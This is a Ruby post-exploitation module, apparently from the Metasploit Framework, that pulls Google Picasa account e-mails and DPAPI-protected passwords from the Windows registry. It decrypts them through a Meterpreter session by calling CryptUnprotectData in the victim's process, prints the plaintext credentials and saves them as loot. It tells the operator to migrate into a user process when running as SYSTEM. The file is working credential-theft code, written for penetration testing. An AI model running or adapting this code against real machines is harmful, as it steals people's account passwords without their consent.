GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
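class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Priv
  include Msf::Auxiliary::Report

  # Registry locations checked for a stored Google account. Picasa 2 and early
  # Picasa 3 builds both keep the account e-mail (GaiaEmail) and a hex-encoded,
  # DPAPI-protected password (GaiaPass) under the user's Preferences key.
  # Insertion order is the order in which results are reported.
  PICASA_PREFERENCE_KEYS = {
    'Picasa 2' => 'HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\',
    'Picasa 3' => 'HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\'
  }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Google Picasa Password Extractor',
        'Description' => %q{
          This module extracts and decrypts the login passwords
          stored by Google Picasa.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com
          'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_railgun_api
              stdapi_sys_config_getuid
              stdapi_sys_process_attach
              stdapi_sys_process_get_processes
              stdapi_sys_process_getpid
              stdapi_sys_process_memory_allocate
              stdapi_sys_process_memory_read
              stdapi_sys_process_memory_write
            ]
          }
        }
      )
    )
  end

  # Makes crypt32 available to railgun so CryptUnprotectData can be called.
  # Idempotent: the DLL is only registered when it is not already known.
  def prepare_railgun
    return if session.railgun.get_dll('crypt32')

    session.railgun.add_dll('crypt32')
  end

  # Decrypts a DPAPI blob by copying it into the Meterpreter host process and
  # calling CryptUnprotectData there through railgun.
  #
  # DPAPI only unprotects data for the logon session that protected it, so
  # this succeeds only while running inside a process of that user (see #run).
  #
  # @param data [String] raw (binary) DPAPI blob
  # @return [String] decrypted bytes, or '' when the blob is empty or the API
  #   returned an empty output blob
  def decrypt_password(data)
    return '' if data.nil? || data.empty?

    pid = client.sys.process.getpid
    process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
    mem = nil

    begin
      # Never allocate less than the blob itself, so a long blob cannot be
      # written past the end of the scratch buffer.
      mem = process.memory.allocate([data.length, 512].max)
      process.memory.write(mem, data)

      # DATA_BLOB is { cbData, pbData }; both the pointer width used to pack it
      # and the size of the output DATA_BLOB buffer depend on the architecture
      # of the process railgun runs in.
      proc_info = session.sys.process.each_process.find { |pi| pi['pid'] == pid }
      fmt, out_size = proc_info['arch'] == 'x86' ? ['V', 8] : ['Q', 16]

      blob_in = [data.length, mem].pack("#{fmt}2")
      ret = session.railgun.crypt32.CryptUnprotectData(blob_in, 16, nil, nil, nil, 0, out_size)
      len, addr = ret['pDataOut'].unpack("#{fmt}2")

      return '' if len.nil? || len == 0

      process.memory.read(addr, len)
    ensure
      # Release the scratch buffer and the process handle even when railgun
      # or a memory operation raised.
      process.memory.free(mem) if mem
      process.close
    end
  end

  # Looks up the account stored under one Picasa preferences key.
  #
  # @param key [String] registry key holding the GaiaEmail / GaiaPass values
  # @return [Array(String, String), nil] [username, decrypted password], or nil
  #   when either value is absent or the password decrypts to nothing
  def picasa_credentials(key)
    username = registry_getvaldata(key, 'GaiaEmail') || ''
    password = registry_getvaldata(key, 'GaiaPass') || ''
    return if username.empty? || password.empty?

    # GaiaPass is the hex encoding of the DPAPI blob.
    pass = decrypt_password([password].pack('H*'))
    return if pass.nil? || pass.empty?

    [username, pass]
  end

  # Checks every known Picasa preferences key, reports each recovered account
  # and stores the results as CSV loot. Errors are reported, not raised.
  def get_registry
    print_status('Looking in registry for stored login passwords by Picasa ...')

    credentials = Rex::Text::Table.new(
      'Header' => 'Picasa Credentials',
      'Indent' => 1,
      'Columns' => ['User', 'Password']
    )

    PICASA_PREFERENCE_KEYS.each do |label, key|
      username, pass = picasa_credentials(key)
      next unless username

      print_status("Found #{label} credentials.")
      print_good("Username: #{username}\t Password: #{pass}")
      credentials << [username, pass]
    end

    if credentials.rows.empty?
      print_status('No Picasa credentials found.')
      return
    end

    path = store_loot(
      'picasa.creds',
      'text/csv',
      session,
      credentials.to_csv,
      'decrypted_picasa_data.csv',
      'Decrypted Picasa Passwords'
    )
    print_status("Decrypted passwords saved in: #{path}")
  rescue ::StandardError => e
    # StandardError rather than Exception so interrupts and exits still
    # propagate to the framework.
    print_error("An error has occurred: #{e}")
  end

  # Entry point. Decryption only works in the context of the owning user's
  # account, so refuse to continue when running as SYSTEM.
  def run
    uid = session.sys.config.getuid

    if is_system?
      print_error("This module is running under #{uid}.")
      print_error('Automatic decryption will not be possible.')
      print_error('Migrate to a user process to achieve successful decryption (e.g. explorer.exe).')
    else
      prepare_railgun
      get_registry
    end

    print_status('Done')
  end
end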